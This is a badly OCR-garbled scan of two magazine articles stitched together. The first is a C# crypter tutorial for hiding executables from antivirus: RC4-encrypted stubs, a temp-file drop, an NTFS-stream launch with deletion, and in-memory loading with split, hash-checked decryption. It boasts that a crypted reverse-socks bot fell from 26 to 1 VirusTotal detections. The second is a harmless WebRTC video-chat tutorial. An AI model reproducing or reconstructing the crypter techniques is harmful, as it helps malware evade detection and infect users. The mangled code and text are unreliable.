‚ Стаб — получаемый на выходе файл, содержит защищенную про- 
грамму в шифрованном виде и код для ее дешифрования с последу- 
ющим запуском. 


Выделяют следующие виды крипторов: 
‚ Уанс (стаб-код запуска одинаков всегда); 
. Роутогри (стаб-код запуска всегда разный). 


Запуск в них может производиться двумя способами: 
. осапите (запись расшифрованного файла на НОО, запуск); 
. ИАипите (расшифровка и запуск производятся в памяти). 


В данной статье речь пойдет о З{айс-крипторе на языке С Зпагр, тип 
запуска Зсатите и Випите. Если у тебя еще не установлена среда раз- 
работки, то самое время скачать и установить бесплатный пакет \М!5зиа! 
Зиаю Ехрге$$ с сайта М!сгозой, в своих примерах я использовал версию 
2010. Код каждого из них с подробными комментариями есть на нашем 
О\О, здесь же я проиллюстрирую только самые интересные моменты. 
Внутри проектов создан текстовый файл Фоигсе («Проект —> Свойства -> 


КМА — - 
НА СИШАРИП 


ы | 


Ресурсы —› Файлы»), он же стаб, копия которого хранится в классе Те${.с$ 
для контроля над синтаксисом. 
Ну что, теорию повторили, направление выбрали, поехали... 


$САМТИМЕ СВУРТЕВ 

Итак, первый на очереди Зсапите, который для запуска программы вы- 
нужден предварительно записать ее на НОВО. Запускаем \Мзиа! Зиаю 
и открываем проект из архива Сзпагр_ЗсапТите_Тетр.гаг. Два раза на- 
жимаем на ЕГогт1.с$ и смотрим на красивый СЧ-интерфейс нашей 
программы (рис. 1), код обработчиков доступен по двойному нажатию 
на элементы управления. 

Теперь познакомимся поближе с внутренностями кнопки Сгур\. 
Начинается все с создания экземпляра класса Зучет.Везоигсез. 
Везоигсе\Мщег("гез.гезоигсе$"), потом методом АЧаВезоигсе мы задаем 
имя нового вложенного ресурса Не и сразу же шифруем исходный файл 
по указанному пути алгоритмом НРСА и заданным через запятую ключом 
ВСАКЕУ Затем в дело вступает СодеОот, в котором мы указываем требуе- 
мыепараметры компиляциичерез СотрйегРагатщег$ (СепегмеЕхесща Ме 
=1{гие, ОмрщАззетыу = "ЕИе.ехе", ВеГегептпсеч9Аз ет Ие5.Аада("Зует.а!”), 
ЕтбеааеаВезоигсе$.Ааа("гез.гезоигсе$"), СотрйегОрНоп$ += "Алммпехе"). 
Параметры выходного файла указаны в СотрйегВези $. Чтобы не му- 
сорить на своем НОО, подчищаем временные файлы удалением [Е. 
реве("ге$.гезоигсе$") и, наконец, проверяем свежеиспеченный боевой 
стаб на наличие ошибок при помощи Содаерот.Сотрйег.СотрйегЕттог. 
На этом, в принципе, и все, взяли файл, зашифровали, записали в ресур- 
сы. Рассмотрим типы запуска. 


Всемогущий Тетр 

Сделаем так, чтобы при открытии нашей программы криптованный файл 
попадал в папку временных файлов %етр%. Открываем стаб, а точ- 
нее — текстовый файл Зоиугсе из архива Сзпагр_ЗсапТите_Тетр.гаг. Оки- 
дываем беглым взглядом код и понимаем, что в целом мы производим 
практически те же (за некоторым исключением) действия, но в обратном 
порядке. У нас вызывается ВезоигсеМападег, задается имя вложенно- 
го ресурса и используемый алгоритм шифрования с ключом ВСАКЕ\. 


то Кодинг 


РИ РОгИП1 


Рис. 1. Шикарный дизайн нашего приложения. Готов побеждать 
в государственных тендерах! 


Результат этих действий сохраняется в переменную массива 
байтов Б, он и становится тем файлом, защиту которого мы 
организовывали. Осталось записать его и запустить. Для этого 
воспользуемся классом Рай.СейетрРа(), который вернет 
актуальный для данной машины путь к временной папке в пере- 
менную па "патеА", а для удобства сразу допишем подходя- 
щее нам имя будущего файла Уоиг _Е!е.ехе. Байты есть, полный 
путь готов (включая имя), давай же скорее писать! Для этого вы- 
зываем метод М/щедА!Вуе$ класса Ее, передавая ранее указан- 
ные параметры в виде аргументов. Последней строчкой кода 
будет Ргосе$$. За (патеА), который и запустит наш процесс. 

Минус такого подхода в том, что сканер антивируса увидит 
запрос на запись в папку и будет готов просканировать безза- 
щитную программу в моментее появления. Этот способ может 
запустить любой файл пай\е или .МЕТ. 


МТЕ$-потоки 

Открываем второй архив под именем Сзпагр_ЗапТите_МТЕЗ. 

гаг, смотрим файл Зоугсе. И видим почти ту же самую картину, 

за исключением того, что размер стаба увеличился более чем 

в два раза. А все потому, что там используются АР!-функции 

и их полный код обязан присутствовать в листинге. Разберем 

все по этапам: 

1. Вместо одного полного имени файла мы задаем еще одно. 
Это имя нашего потока, которое будет записано через 
двоеточие, что в итоге даст такой результат: уизПетрЕШе. 
{тр.УоигЕ|е.ехе. 

2. ЗаписьосуществляетсяприпомощиклассаРтуоке\№т32АР. 
\МлмедКетае ГеатВуУе$(патеА, МТЕЗМате, 5), в качестве 
аргументов он принимает полное имя файла, имя потока 
и сами байты, которые требуется записать. 

3. Запуск Ргосе$$.З{аг(), которым здесь не отделаешься, по- 
скольку данный способ не сработает на \ММпаом/$ 7 и выше 
(висту не тестировал). Выход из ситуации предоставил 
могучий АР|!, вызывается он строкой ЗаиМТЕ$Ргосез$. 
Зан(патеад + ":" + МТЕЗМате), где и происходит обращение 
кименованному потоку. 

4. Выдерживаем секундную паузу и удаляем файл [е. 
Беще(патеА), для глаза эта операция незаметна, и папка 
УЧетр% кажется нетронутой. Процесс работает исправно, 
но на диске уже ничего нет. 


Минус этого подхода аналогичен первому — запись «чи- 
стого» файла на НОВ. Этот способ сработает только для пай\е- 
приложений и файловой системы МТЕ$. Для просмотра потоков 
я использовал бесплатную программу Айета{е геат\Ме\м. 


ВОМТ!МЕ СВУРТЕВ 

В двух предыдущих примерах зашифрованное приложение 
было записано в ресурсы выходного файла и запускалось 
с НОО. Сейчас же мы разместим его в коде стаба при помощи 
Вазеб4-кодировки и перезаписи Зоигсе каждый раз при нажа- 
тии кнопки Сгурт. Рассмотренные примеры актуальны только 
для .МЕТ-приложений. Вот как это выглядит: 


Буфе[] #1еБуЕез$ = ВКС4Епсгур{Оесгкурт* (5узет. «= 
ТО.Е11е.ВеааА11Ву{е$ (техЕВох1.Техе), "КСАКЕУ"); 
${г1па Мем$оигсе = РгорегЕ1е$ .Кезоигсе$ .5оигсе; 
Мем5оигсе = Мем5оигсе.Кер1асе ("ФЕТЕЕ$", Сопмеге. += 
ТоВазеб45{г1п8(#1еБу{ез)); 


Мы также шифруем байты, но при этом создаем еще 
одну переменную $па, в которую записываем весь Зоугсе, 
и, используя метод Вер!асе, заменяем заранее заданные 
метки на новые данные. Корректируем Соаерот.Сотриег. 
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Рис. 2. Папка\фетр из способа с МТЕ$ -потоками 
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Сотр!егВези[$, и дальше без изменений. Но теперь при открытии нашего стаба 
в том же .МЕТ Вейесюг вложенных ресурсов мы не обнаружим, и выудить файл 
сложнее. Перейдем к запуску. 


Какделают многие 
Открываем файл проекта из архива Сзпагр_ВипТите_Зитре.гаг, смотрим Зочгсе. 


${а{1с \014 Ма1п() { 
Буфе[] Бефуг11е = ВКС4Епсгур®Оесгур* ( Сопуег* . «= 
ЕгоМВазе645+г1пв ("ФЕТЬЕ$"), "ВСАКЕУ"); 
5узЕет. Кейес{1оп.АззетЬ1у.[Еоаа(БефуЕ11е) .ЕпЕгуРо1ит. <= 
ТпуокКе (пи11, пи11); 
} 


Этот код запустит наше приложение из памяти, минуя НОВ и сигнатурный ана- 
лиз антивируса. Протестируем на работающем антивирусе... ого, не сработало! 
В чем проблема? Хм... проблема в пароле, точнее, в том, что он хранится в откры- 
том и доступном для статического анализа виде. А это значит, что мы подошли кса- 
мому интересному и ключевому моменту статьи... 


Каксделаем мы 
Открываем проект файла из архива С5$пагр_ВипПите_Нага.гаг и наблюдаем боль- 
шие изменения в программе. 

Теперь мы можем менять сведения о сборке и наконец-то дописали код 
для иконки. Проблема решена, пароль в стабе не видно! Хе-хе. 

Вот так выглядит работа усложненного стаба: берем файл, шифруем, делим 
на части, шифруем части разными паролями и переворачиваем некоторые из них. 
Сохраняем все это в файл Зоигсе. При запуске такого стаба он проделает все эти 
операции наоборот и практически мгновенно, благодаря многопоточности и хеш- 
суммам для контроля правильной расшифровки байт. Вот как это выглядит: 


61оБа1$.гапаотРа$$мА = КапдотРа$ $Мемб1оБа1 (); 
Буфе[] #1еБуеез = ВС4Епсгур®Оесгкур* (5узЕет.ТО.Е11е. += 
ВеадА11Ву{е$ (техЕВох1.ТехЕ), 61оБа1$.гапаотРа$$ма); 
1пЕ а = Я1ебуфе$ .1епёЕИ / 4; 
Буфе[] рагфоПебуе$ = пем Буфе[а]; 
Аггау.Сору (В1ебу{е$, 9, рагфоЕПеБуте$, 6, а); 
6]1оБа1$.рагЕОпеНа$И = та5На$И+ 
(Сопмег* .ТоВазеб 45 г1пв (рагфо+%Пебу{тез)); 
61оба1$5.рагЕОпеКкеу = КапаотРа$$Мем(); 
рагфо+ПеБуез = ВС4ЕпсгурВесгурт+ = 
(рагко+ЕПебуе$, 61оба1$.раг*ОпеКеу); 
61оБа15.Я1еРагЕОпе = Сопуег{.ТоВазеб45{г1пв (рагЕоПеру{ез); 
риб11с зфаф1с $%и1п8 ВапаотРа$$Мем() { 

Вапдот гп = пем Капаот(); 


и1пЕ гОпе = (и1п®) гпа.М№ хе (52345, 52348); 
ии гТмо = (11) гпа.МехЕ (39327, 39329); 
ити гМиТ = гОпе * гТмо; 


геёигп гМи1 .То5г1п2(); 


Первой строкой получаем случайный мастер-пароль, затем шифруем им вы- 
бранный файл, делим его длину на 4 (если он нечетный — дописываем один пу- 
стой байт). Создаем массив, равный размеру одной этой части, и при помощи 
Аггау.Сору() поэтапно копируем в него шифрованные байты. Вычисляем МО5-хеш 


Не зивбоще 15 о |) я Э 
Э Майа а гены Г ойее а В р 
9 лвл не бе о ве ыы 

№ 


в СНЕ. 
В Е 


У\УАВММС 


© Змеев бы 


Вся иноформация 
предоставлена 
исключительно 

в ознакомительных 

целях. Ни редакция, 
ни автор не несут 
ответственности 
залюбой возможный 
вред, причиненный 
материалами данной 
статьи. 


ХАКЕР 09 /176/ 2013 Криптор на сишарпе 


Бр 
Ореп Ре || 


баесИсоп бух _ | 
ТЧе: [бе о 
Безспрйоп: |Сурез 
Сотрапу: [бе 
Ргодисе [був о 
СорупавЕ бу с 
Тгадетагк: |Сурез 
Мегаюпт: [Юр | о 
РИе\егюп: Г 6 рб | та | 


Рис. 3. Измененный интерфейс — добавлен новый функционал 


Сопуе[.ТоВазеб4 $ па() и повторно шифруем этот кусок новым па- 
ролем. После чего он готов к записи в стаб. 

Самое главное в крипторе посмотрели, теперь рассмотрим крат- 
кую выдержку из файла стаба: 


Тигеа {геадрагфопе = пем ТВгеад(ТпгеааРоигМе*воа); 
{Игеаараг®опе. 5Таг*(); 
рг1уаЕе °фа{1с уо1а Тигеа4РоигМеепоа() { 
$Ег1п8 рагЕРоигНа$И = "$рагЕРоигНа$Н$"; 
БуЕе[] ВуЕеЕ11еРоиг = Сопуег* . <= 
ЕГгОоМВазе6 45 +г1 пе ( "$базеРоиг$"); 
ий11е (+гие) { $&г1пё гпара$$ма = КапаотРа$$Мем(); 
Буфе[] БефокпаресОпе = «= 
ВС4Епсгур{Оесгур* (Ву{еЕ11еРоуг, гпара$$ма); 
${г1пв БиЕРегРогРаг&$ = ма5НазИ (Сопуеге . «= 
ТоВазеб45+г1пв (Бефовпа0ес0пе)); 


тт агЕЕочгНа$И == Би РегЕогРаг*$ 
БутеРготЕПгеаЯоиг = БефовпаОесОпе; 
бгеак; 

} 


} 


} 


Аггау .Веуег5е (БуфеготЕИгеаа мо); 

Аггау. Сору (БуфеРготЕПгеадопе, 9, Е11еНеге, 09, «= 
БуЕеготЕИгеадопе . Гепа); 

бузЕет. КейесЕ1опт .АззетЬ1у.1оаа(ВС4ЕпсгурБесгур*-= 
(Тезфа, (+езеЬ + Жез®ссс).То5&г1пй())).ЕпЕгУуРо1п* . += 


ТпуокКе (пи11, пч11); 


В результате работы этого кода мы создаем новый поток, всего 
их будет пять. Первые четыре выполняют расшифровку записанных 
частей, для чего они каждый раз, подбирая пароль, сверяют полу- 
ченный хеш строки с правильным. По окончании этого процесса 
управление возвращается главному потоку, где далее происходит 
переворачивание некоторых байт классом Аггау.Веуег$е() и склейка 
в Аггау.Сору(). Все, байты готовы, для запуска используется финаль- 
ный пятый поток, выполняющий Зу$ет.ВеНесйоп.Аззет Ыу.1оаа(), 
как и в первом случае (если стаб не стартует, криптуем файл заново). 


ПРОВЕРЯЕМ \М!ВОЗТОТАГОМ 

Для проверки нашего криптора я взял старый ВеуегзеЗоск$Во\, на- 
писанный на .МЕТ, и загрузил его на УТ (исключительно для нагляд- 
ности). Его результат составил 26/46 (рис. 4). Затем я закриптовал 
файл и загрузил его повторно. Показатель значительно улучшился 
и составил 1/46 (рис. 5), что очень неплохо! 


ЗАКЛЮЧЕНИЕ 

.МЕТ — интересная и быстро развивающаяся платформа, опасаться 
отсутствия Егатемогк на целевой машине практически не приходит- 
ся. «Сила» применяемого алгоритма шифрования не самое главное 
в крипторе, гораздо важнее (и перспективнее) найти новую комби- 
нацию его применения. Напоследок еще раз повторю: не используй 
эти знания в противозаконных целях! = 
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Юзаем У’еБВТС + 
сокеты для звонков 
из чистого 
браузера 


Технологиям для звон- 
ков из браузера 

уже много лет: уама, 
Астмех, Адобе Наби... 

В последние несколько 
лет стало ясно, что пла- 
гины и левые виртуаль- 
ные машины не блещут 
удобством (зачем мне 
вообще что-то устанав- 
ливать?) и, самое главное, 
безопасностью. Что же де- 
лать? Выход есть! 
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Александр Лыкошин 
а!укозит@атай.сот, 
папе.ги 


ВИДЕОЧАТ БЕЗ ПЛАГИНОВ 


о последнего времени в 1Р-сетях существовало несколько вари- 
антов для организации голосовой и видеосвязи: ЗР, наиболее 
распространенный протокол, сходящие со сцены Н.323 и МССР, 
чЧаббег/Лпае (используемый в СцаК), полуоткрытые Адобе АТМР* 
и, конечно, закрытый ЗкКуре. Проект \Меб РТС, инициированный СоодЕ, пы- 
тается изменить сложившееся положение дел в мире ПР- и веб-телефонии, 
сделав ненужными все программные телефоны, включая $Куре. \Меб ВТС 
не просто реализует все коммуникационные возможности непосред- 
ственно внутри браузера, установленного сейчас практически на каждом 
устройстве, но пытается одновременно решить более общую задачу ком- 
муникаций между пользователями браузеров (обмен различными данными, 
трансляция экранов, совместная работа с документами и многое другое). 


\ММеь ВТС со стороны веб-разработчика 

С точки зрения веб-разработчика \еБ ВТС состоит из двух основных частей: 
управление медиапотоками от локальных ресурсов (камеры, микрофо- 
на или экрана локального компьютера) реализуется методом памдафог. 
деЧУзегМеч!а, возвращающим объект Меда5Неат; 
реег-{о-реег коммуникации между устройствами, генерирующими ме- 
диапотоки, включая определение способов связи и непосредственно 
их передачу — объекты АТСРеегСоппесйоп (для отправки и получения 
аудио- и видеопотоков) и АТСВааСвПаппе! (для отправки и получения 
данных из браузера). 


ИЕ 

Мы разберемся, как организовать простейший многопользовательский 
видеочат между браузерами на основе \\№еБВТС с использованием веб- 
сокетов. Экспериментировать начнем в Спготе/СВгоптит, как наиболее 
продвинутых в плане \Меб АТС браузерах, хотя начиная с 22 версии РНгеюх 
почти их догнал. Нужно сказать, что стандарт еще не принят и от версии 
к версии АР! может меняться. Все примеры проверялись в Спгоптит 28. 
Для простоты не будем следить за чистотой кода и кросс-браузерностью. 


Меда{геат 

Первый и самый простой компонент \М/евА ТС — Меча еат. Он предо- 
ставляет браузеру доступ к медиапотокам с камеры и микрофона ло- 
кального компьютера. В СПготе для этого необходимо вызвать функцию 
памдаюг.мебкиСезегМед!а() (так как стандарт еще не завершен, все 
функции идут с префиксом, ив ЕгеТох эта же функция называется памдатог. 
по7@еУегМед!а()). При ее вызове пользователю будет выведен запрос 
о разрешении доступа к камере и микрофону. Продолжить звонок можно 
будет только после того, как пользователь даст свое согласие. В качестве 
параметров этой функции передаются параметры требуемого медиапото- 
ка и две са!баск-функции: первая будет вызвана в случае успешного полу- 
чения доступа к камере/микрофону, вторая — в случае ошибки. Для начала 
создадим НТМЁЕ-файл имея .Ми! с кнопкой и элементом <маео>: 


<!БОСТУРЕ Ит1> 
<пт1> 
<Пеад><+1{1е>меьвТС - первое знакомство< /{1*1е> 
<5фу1е> 
У1аео { Пелей*: о; ма: о; 
Богаег: __› $0114 эгеу; } 
</5$у1е> 
</Пеаа> 
<Боду> 
<БиЕфоп 19="6п_ветУзегМейд1а" 


опс11сК=" ве егМей1а_с11ск()"> 
зеЕ/5егМедТа 
</Биоп> 
<бг> 
<\1Аео 14="1оса1\/14е01" ачфор1ау=" гие" >< /\м14ео> 
<5сг1р*></5сг1рЕ> 
</Боау> 
</Пт1 > 


дезПабоу500@ЯсСКг.соп 
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ВКЛЮЧЕНИЕ ЛОКАЛЬНОГО ПОТОКА 
Внутри тегов <$сйр{> </зспр{> нашего НТМ!-файла объявим 
глобальную переменную для медиапотока: 


уаг 1оса15${геат = пи11; 


Первым параметром методу де зегМе а необходимо 
указать параметры запрашиваемого медиапотока — напри- 
мер просто включить аудио или видео: 


// Запрашиваем доступ и к аудио, и к видео 
уаг $ЕгеатСоп$Егати*$ = "ачато" : гие 
"м1аео" : *%гие }; 


Либо указать дополнительные параметры: 


маг ${геатСоп${га1п*$ = { 


"ацато": гие, 
"м1аео": { 
"тапаафогу"; { "тахитаеи" А 
"тахНезей*" РОО". 
"тахЕгатекафе" : "5" }, 


ореола ви] 


| 


$; 


Вторым параметром методу де{УзегМе!а необходимо пе- 
редать са!баск-функцию, которая будет вызвана в случае его 
успешного выполнения: 


ФипсЕтоп веУзегМе1а_зиссе$$5 ($<&геат) { 
сопзо1Те. 1о8("ретИзегМед1а_зиссе$$():", $&геат); 
// Подключаем медиапоток к НТМЕ-элементу <\14ео> 
]1оса1\14ео1.5згс = УВЕ. сгеаеОбзес УВЕ ( з&геат); 
//_и сохраняем в глобальной переменной 
// для дальнейшего использования 
]1оса15${геат = $%геам; 


Третий параметр — саЙБаск-функция обработчик ошибки, 
который будет вызван в случае ошибки 


ФипсЕтоп ве УзегМей1а_еггог(еггог) { 
сопзо1е. 1о8("ретИзегМед1а_еггог():", еггог); 


й 


Собственно вызов метода де зегМе а — запрос доступа 
к микрофону и камере при нажатии на первую кнопку 


ФипсЕ1топ веУзегМе@1а_с11ск() { 
сопзо1е. 108 ( "сет/5егМей1а_с11ск()"); 


пау1еафог.мебк1бееУзегМе1а (5ЕгеатСоп5га1п®5$ , 
зе/5егМед1а_зиссез$, вееУзегМей1а_еггог); 


} 


Получить доступ к медиапотоку из файла, открытого локально, 
невозможно. Если попытаться, то в консоли мы получим ошибку: 


Ма\15афогИегМед1аЕггог {соае: _, 
РЕКМТ$5ТОМ_ОЕМТЕО: }" 


Выложим получившийся файл на сервер, откроем в браузере 
и в ответ на появившийся запрос разрешим доступ к камере 
и микрофону. 

Выбрать устройства, к которым получит доступ Спготе, 
можно в Зе то$ («Настройки»), линк ЭПом/ аауапсеа зейта$ 
(«Показать дополнительные настройки»), раздел Ри\асу 
(«Личные данные»), кнопка Сощеп{ («Настройки контента»). 


м\лёБЯТС - первое знак: 


«- С Г ке&вожЕЛсскеяе1 


ШК ВЕЕРУЛосаЛоз/ запрашивает ра... Запретить | Разрешить 
к, 


Запрос надоступ ккамере и микрофону 
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Участник 1 Участник 2 


Обменуправляющей информацией о медиапотокахи сетевыхадресах и потоках 


ОР СЕ ОР СЕ 


Взаимодействие 
ВТСРеегСоппесвоп 


В браузерах Ететох и Орега выбор устройств осуществляется извыпадающего списка 
непосредственно при разрешении доступа. 

При использовании протокола НТТР разрешение будет запрашиваться каж- 
дый раз при получении доступа к медиапотоку после загрузки страницы. Переход 
на НТТР$ позволит выводить запрос однократно, только при самом первом доступе 
к медиапотоку. 

Появившиеся пульсирующий кружок в иконке закладки и значок камеры в правой 
части адресной строки информируют пользователя об активной трансляции. 


ВТСМечаСоппесНноп 


АТтСМедаСоппеснНоп — объект, предназначенный для установления и передачи ме- 
диапотоков по сети между участниками. Кроме того, этот объект отвечает за форми- 
рование описания медиасессии (30Р), получение информации об 1СЕ-кандидатах 
для прохождения через МАТ или сетевые экраны (локальные и с помощью ЭТИМ) 
и взаимодействие с ТУВ№-сервером. У каждого участника должно быть по одному 
АТСМедаСоппесйоп на каждое соединение. Медиапотоки передаются по шифрован- 
ному протоколу ЗЭНАТР. 

Для АТСМеаСоппесноп необходим дополнительный механизм обмена управля- 
ющей информацией для установления соединения — хотя он и формирует эти дан- 
ные, но не передает их, и передачу другим участниками необходимо реализовывать 
отдельно. 

Выбор способа передачи возлагается на разработчика — хоть вручную. Как толь- 
ко обмен необходимыми данными пройдет, РТСМечаСоппесноп установит медиапо- 
токи автоматически (если получится, конечно). 


МОДЕЛЬ ОЕЕЕВ -АМЗ\МЕВ 

Для установления и изменения медиапотоков используется модель оНег/апзмег 

(предложение/ответ; описана в ВЕСЗ264: 10015 1е11.ога/ Вит Ис3264) и протокол ЗОР 

(Зеззюп БезсирНоп Рготосо!). Они же используются и протоколом $Р. В этой модели 

выделяется два агента: ОНегег — тот, кто генерирует 5ОР-описание сессии для соз- 

дания новой или модификации существующей (ОНег $ОР), и Апзмегег — тот, кто полу- 
чает $ОР-описание сессии от другого агента и отвечает ему собственным описанием 
сессии (Апзмег ЗОР). При этом в спецификации требуется наличие протокола более 
высокого уровня (например, $Р или собственного поверх веб-сокетов, как в нашем 
случае), отвечающего за передачу ЗОР между агентами. 

Какие данные необходимо передать между двумя ВАТСМеЧаСоппесноп, чтобы они 
смогли успешно установить медиапотоки: 

. Первый участник, инициирующий соединение, формирует ОКег, в котором пере- 
дает структуру данных $ЗОР (этот же протокол для той же цели используется в $!Р), 
описывающую возможные характеристики медиапотока, который он собирается 
начать передавать. Этот блок данных необходимо передать второму участнику. 
Второй участник формирует Ап$\мег, со своим ЗОР и пересылает его первому. 

. И первый и второй участники выполняют процедуру определения возможных |СЕ- 
кандидатов, с помощью которых кним сможет передать медиапоток второй участ- 
ник. По мере определения кандидатов информация о них должна передаваться 
другому участнику. 


ФОРМИРОВАНИЕ ОРЕЕВ 

Для формирования ОНег нам понадобятся две функции. Первая будет вызываться 
в случае его успешного формирования. Второй параметр метода сгеаеОНек) — 
са!баск-функция, вызываемая в случае ошибки при его выполнении (при условии, 
что локальный поток уже доступен). 

Дополнительно понадобятся два обработчика событий: опсесапааае при опре- 
делении нового |СЕ-кандидата и опадагеат при подключении медиапотока от даль- 
ней стороны. 

Вернемся к нашему файлу. Добавим в НТМЕ после строки с элементом <БиЦоп> 
еще одну: 
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<БиЕ оп 149="Б{п_сгеаееО{+ег" 
опс]11сК=" сгеаео Рег _с11ск(_)">сгеафео{ег< /Биоп> 


И после строки с элементом <маео> (на будущее): 


<Бг> 
<\14ео 14= оо со’ ачфор1Тау=гие></\у1аео> 


Также в начале уауаЗспрй-кода объявим глобальную переменную 
для АТСРеегСоппесйоп: 


уаг рс1; 
При вызове конструктора РТСРеегСоппесНоп необходимо указать ЗТУМ/ 
ТУАМ-серверы. Подробнее о них см. врезку; пока все участники находятся 


в одной сети, они не требуются. 


уаг зегуег$ = пи11 


Параметры для подготовки ОНег ЗОР 


маг оф+егСоп${га1п*$ = {}; 


Первый параметр метода сгезмеОНег() — са!Баск-функция, вызываемая 
при успешном формировании ОНег 


ФипсЕтоп рс1_сгеа*еОо+ег_зиссе$$ (4езс) { 
сопзо]1е.105("рс1_ сгеафе0Рег_зиссе$$(): \пае$с. зар: \ 
о +ае$с.5ар+ <_<, 4е5с); 
//_ Зададим ВТСРеегСоппесЕ1оп, сформированный О+ег $0Р 
// методом зе Ёоса1Безсг1рЕ1оп 
рс1 . зе Ёоса1Безсг1рЕ1оп(4е$с); 


// Когда дальняя сторона пришлет свой Апзмег $0Р, его нужно 
// будет задать методом зе{Кетотер)е$сг1ре1оп. Пока вторая 
// сторона не реализована, ничего не делаем 


МИСВОЗОЕТ С0-ВТС-МЕВ 


М!сго$ой не была бы Мгсгозо8, если бы 
в ответ на инициативу Сооде не выпу- 
стила немедленно свой собственный 
несовместимый нестандартный вари- 
ант под названием СУ-АТС-\Меь (6и.1у/ 
763гге). Хотя доля ИЕ, и так небольшая, 
продолжает сокращаться, количество 
пользователей ЗкКуре дает Мгсгозой на- 
дежду потеснить Соодге, и можно пред- 
положить, что именно этот стандарт 
будет использоваться в браузерной 
версии ЗкКуре. Стандарт Сооде ориен- 
тирован в первую очередь на коммуни- 
кации между браузерами; в то же вре- 
мя основная часть голосового трафика 
по-прежнему остается в обычной теле- 
фонной сети, и шлюзы между ней и [Р- 
сетями необходимы не только для удоб- 
ства использования или более быстрого 
распространения, но и в качестве сред- 
ства монетизации, которое позволит 
большему числу игроков их развивать. 

Появление еще одного стандарта 
может не только привести к непри- 
ятной необходимости разработчикам 
поддерживать сразу две несовмести- 
мых технологии, но и в перспективе 
дать пользователю более широкий 
выбор возможного функционала и до- 
ступных технических решений. Пожи- 
вем — увидим. 


Запрашиваем формирование ОНег, который ! 
содержит $ОР,‚ упервого соединения \, 


Добавляем локальный поток ! 
кпервому соединению !^\ | 


В случае успеха получаем ОНегс $0Р я 


Передаем первому соединению ОНегс ЗПР ! 
как описание локальной стороны : 


Задаем ОНегс 5ОР второму соединению как а 
описание удаленной стороны : | 


Запрашиваем и передаем Апзмег ОР ! 


вобратную сторону ! 


При обнаружении !СЕ-кандидата в. 


Передаем!СЕ-кандидат о —— 
другомуучастнику № \ 


При установлении медиапотока <-—_ 


Последовательность обмена 
ВТСРеегСоппесНоп 
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// рс2_гесе1уед0++ег (дезс); 


} 


Второй параметр — са!Баск-функция, которая будет вызвана в случае 
ошибки 


Риисе той рс1_сгеае0+ег_еггог(еггог){ 
соп$о1е.105("рс1_ сгеафе0+Рег_зиссе$$_еггог(): еггог:", еггог); 


| 


Объявим саЙ!раск-функцию, которой будут передаваться |1СЕ-кандидаты 
по мере их определения: 


ФипсЕтой рс1_оп1сесапа1Аате (емеп*) { 
1+ (емеп®.сапа1аа*е) { 
сопзо1е.108("рс1 оп1сесапа1аате():\п"+ 
е\уеп{ . сапЧ1Ча*е. сапа1Аате .гер1асе 
(  , ), е\епе. сапа1да*ее); 


//_ Пока вторая сторона не реализована, ничего не делаем 
// рс2.ааа9ТсеСапа19аее (пем 
//_ВТСТсеСапа1да*е (еуеп* .сапа14а*е)); 


} 


} 


а также са!Баск-функцию для добавления медиапотока от дальней стороны 
(на будущее, так как пока у нас только один АТСРеегСоппесноп): 


КипсЕтой рс1_опада${геат(еумепт®) { 
сопзо1е.108("рс_опаа$геат()"); 
гетофе\/14ео1.5гс = УВЕ. сгеаеОбзес УВЕ (е\мепЕ . $Егеат) ; 


1. 


При нажатии на кнопку сгеаеОНег создадим НРТСРеегСоппесйоп, зада- 
дим методы опсесапащае и опадаатеат и запросим формирование ОНег 
ЗОР, вызвав метод сгежмеО{Нег(): 


рс: ВТСРеегСоппесНоп 


м! аа геат() 


\ | | 
\, | 
1 сгеатеО{Рег() | 


Е РЯ 


| 
| зеаРВетоебезсирйоп(оНег) | 
| | 
| 
| 


рс: ВТСРеегСоппесНоп 


| 
сгеатеАпзмег() 


| | апз\мег 


<< Ее. 
__ 1 зеНосаезсирйоп(ап\мег) | 


| зеРетоебезсирНоп(апз\мег) 


| | 
| | 
| опсесап4аа{е(сапаа!е) | 
| ачсеСапаа{е(сап4аа{е) 


опааазеат($1теат) | 


_ р р 
У опаа4$1геат($1геат) | 

| | 

| 
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ФипсЕ1оп сгеажео+ег_с11ск() { 
сопзо1Те. 10о5("сгеафе0ЕРег_с11ск()"); 


// Создаем ВТСРеегСоппесЕтоп 
рс1 = пем мебрк1ВТСРеегСоппес*1оп 
(зегуег$); 


// Са11Баск-функция для обработки 
//_ТСЕ-кандидатов 

рс1 .оп1сесапа1да*е = 
рс1_оп1сесапа1Аа*е; 


//_Са11Баск-функция, вызываемая 

//_ при появлении медиапотока от даль- 
// ней стороны. Пока что его нет 

рс1 .опа4а$Егеам = рс1_опаЧ4а${геат; 


// Передадим локальный медиапоток 
// (предполагаем, что он уже получен) 
рс1 .ааа5Егеат(1оса15геат); 


//_И собственно запрашиваем 

// формирование О+ег 

рс1 .сгеафео{+ег( 
рс1_сгеафеО{+ег_зиссе$$, 


рс1_сгеа*еО+ег_еггог, 
оЕРегСоп$Ега1п*$ 


у. 


} 


Сохраним файл как Иче${2.Мит!, выложим 
его на сервер, откроем в браузере и посмотрим 
в консоли, какие данные он формирует. Второе 
видео пока не появится, так как участник всего 
один. Напомним, ЗОР — описание параметров 
медиасессии, доступные кодеки, медиапотоки, 
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ТИВМ-СЕРВЕРЫ 


|СЕ-кандидаты бывают трех типов: По$ф, з/Их и гаау. Но$ содержат информацию, полученную 
локально, э/Их — то, как узел выглядит для внешнего сервера (ЗТУМ), и геау — информация 
для проксирования трафика через ТУВМ-сервер. Если наш узел находится за МАТ’ом, то Поз${- 
кандидаты будут содержать локальные адреса и будут бесполезны, кандидаты $згИх помогут 
только при определенных видах МАТ и ге!ау будут последней надеждой пропустить трафик через 
промежуточный сервер. 

Пример 1СЕ-кандидата типа Поз1, с адресом 192.168.1.37 и портом иар/34022: 


а=сап1Ча*е: 337499441 2 иар 2113937151 192.168.1.37 34022 фур Поз вепега1оп @ 


Общий формат для задания ЗТУМ/ТУВАМ-серверов: 


уаг зегуег$ = { "1себегуег$": [ 
разре ео ЕН 5 СПреОТОсОТ Юбо а в 
{ "иг": "иги: изег@ро${ : роге", "сгедеп1а1": "раззмога" } 


] 


|: 


Публичных ЭТУМ-серверов в интернете много. Большой список, например, есть здесь: \м/\м/м. 
мор-што.ога/микИлем/ ТОМ. К сожалению, решают они слишком малую часть проблем. Пу- 
бличных же ТУВ№-серверов, в отличие от ЭТИМ, практически нет. Связано это с тем, что ТУВМ- 
сервер пропускает через себя медиапотоки, которые могут значительно загружать и сетевой 
канал, и сам сервер. Поэтому самый простой способ подключиться к ТИВМ-серверам — уста- 
новить его самому (понятно, что потребуется публичный ПР). Из всех серверов, на мой взгляд, 
